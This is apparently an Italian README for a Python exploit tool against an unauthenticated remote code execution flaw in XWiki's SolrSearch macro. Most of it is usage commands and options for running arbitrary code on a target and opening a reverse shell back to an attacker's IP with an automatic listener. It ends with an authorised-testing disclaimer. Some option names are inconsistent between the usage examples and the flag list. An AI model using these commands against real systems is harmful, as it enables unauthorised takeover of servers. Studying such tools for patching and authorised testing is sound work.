
XWiki Exploit RCE non autenticato per Reverse Shell
Exploit XWiki RCE non autenticato
Le versioni interessate di XWiki contengono una vulnerabilità di esecuzione di codice in remoto (RCE) causata da una gestione non sicura delle espressioni Groovy nella macro SolrSearch. Attaccanti non autenticati possono eseguire codice Groovy arbitrario da remoto e ottenere una reverse shell.
Questo exploit può essere utilizzato per eseguire codice sulla macchina target e può anche stabilire una reverse shell. Sono disponibili due modalità: interattiva o basata su parametri. L'exploit può avviare automaticamente un listener o usarne uno esistente.

python3 xwiki_groovy_rce.py
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
-h/--help: Mostra il menu di aiuto
-u/--url: URL XWiki di destinazione (obbligatorio)
-r/--reverse-shell: Esegue una reverse shell
-c/--command: Esegue un singolo comando
-i/--ip: Specifica l'IP del listener (solo per reverse shell)
-p/--port: Specifica la porta del listener (solo per reverse shell, default=4444)
--no-listener: Non avviare un listener (solo per reverse shell)
Questa prova di concetto è solo a scopo educativo e di test autorizzato.
L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione è illegale.
Gli autori non sono responsabili per qualsiasi uso improprio di queste informazioni.